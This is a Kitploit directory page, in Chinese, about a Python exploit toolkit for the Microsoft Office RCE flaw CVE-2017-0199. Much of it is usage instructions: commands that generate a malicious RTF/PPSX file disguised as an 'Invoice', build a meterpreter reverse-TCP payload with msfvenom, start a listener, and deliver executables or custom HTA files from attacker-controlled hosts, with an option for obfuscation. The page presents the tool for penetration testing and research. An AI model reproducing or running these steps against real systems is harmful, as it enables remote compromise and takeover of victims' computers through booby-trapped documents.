Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration. | Kitploit
工具/GitHubGitHub/bhdresh/cve-2017-0199
Payload GenerationExploitationWeb Application ExploitationMalware AnalysisPenetration TestingLearning & Education
GitHubbhdresh/cve-2017-0199

CVE-2017-0199

查看仓库
7242568年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

关于

Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.

分享

漏洞利用工具包 CVE-2017-0199 - v4.0

漏洞利用工具包 CVE-2017-0199 - v4.0 是一个方便的 Python 脚本,为渗透测试人员和安全研究人员提供了一种快速有效的方法来测试 Microsoft Office 远程代码执行(RCE)。它可以生成恶意的 RTF/PPSX 文件,并在无需复杂配置的情况下向受害者投递 metasploit / meterpreter / 其他有效载荷。

免责声明

此程序仅供教育目的。未经许可不得使用。适用通常的免责声明,特别是本人(bhdresh)不对因直接或间接使用这些程序提供的信息或功能所造成的任何损害承担责任。作者或任何互联网提供商对使用这些程序或其任何衍生品的内容或误用不承担任何责任。使用此程序即表示您接受因使用这些程序所造成的任何损害(数据丢失、系统崩溃、系统受损等)并非 bhdresh 的责任。

最后,这是个人开发的作品,请尊重其理念,不要将其用于不良用途!

许可证

CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/

发布说明:

为脚本引入了以下功能

root@kitploit:~
- 生成恶意 PPSX 文件
- 针对生成的 PPSX 文件的利用模式
- 更新了 template.ppsx

版本:Python 2.7.13

场景 1:投递本地有效载荷

示例命令
root@kitploit:~
1) 生成恶意 RTF 文件
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (可选,如果使用 MSF 有效载荷):生成 metasploit 有效载荷并启动处理程序
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) 以利用模式启动工具包以投递本地有效载荷
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
序列图

alt tag

场景 2:投递远程有效载荷

示例命令
root@kitploit:~
1) 生成恶意 RTF 文件
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) 以利用模式启动工具包以投递远程有效载荷
   # python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe
序列图

alt tag

场景 3:投递自定义 HTA 文件

示例命令
root@kitploit:~
1) 生成恶意 RTF 文件
   # python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) 以利用模式启动工具包以投递自定义 HTA 文件
   # python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta
序列图

alt tag

命令行参数:

root@kitploit:~
# python cve-2017-0199_toolkit.py -h

这是一个方便的工具包,用于利用 CVE-2017-0199(Microsoft Office 远程代码执行)

模式:

-M gen                                          仅生成恶意文件

     生成恶意 RTF/PPSX 文件:

      -w <Filename.rtf/Filename.ppsx>     恶意 RTF/PPSX 文件的名称(将此文件分享给受害者)。

      -u <http://attacker.com/test.hta>   HTA/SCT 文件的路径。通常,这应该是运行此工具的域名或 IP。
                                          例如,http://attackerip.com/test.doc(此 URL 将包含在恶意 RTF/PPSX 文件中,受害者在打开恶意 RTF 文件时将请求该 URL)。
      -t RTF|PPSX (默认 = RTF)          要生成的文件类型。
      -x 0|1  (默认 = 0)                生成混淆的 RTF 文件。0 = 禁用,1 = 启用。

				      
-M exp                                          启动利用模式

     利用:
 
      -t RTF|PPSX (默认 = RTF)          要利用的文件类型。
      -H </tmp/custom>                需要投递并在目标上执行的自定义 HTA/SCT 文件的本地路径。
                                      注意:此选项不会投递通过 "-e" 和 "-l" 选项指定的有效载荷。
					  
      -p <TCP 端口:默认 80>              本地端口号。

      -e <http://attacker.com/shell.exe>  需要在目标上执行的可执行文件 / meterpreter shell / 有效载荷的路径。

      -l </tmp/shell.exe>                如果有效载荷托管在本地,请指定可执行文件 / meterpreter shell / 有效载荷的本地路径。

致谢

@nixawk 提供 RTF 样本,@Li Haifei,@bhdresh

错误、问题、功能请求

显然,我不是全职开发人员,所以可能会有一些问题。

请通过 https://github.com/bhdresh/CVE-2017-0199/issues/new 报告错误和问题。

下载工具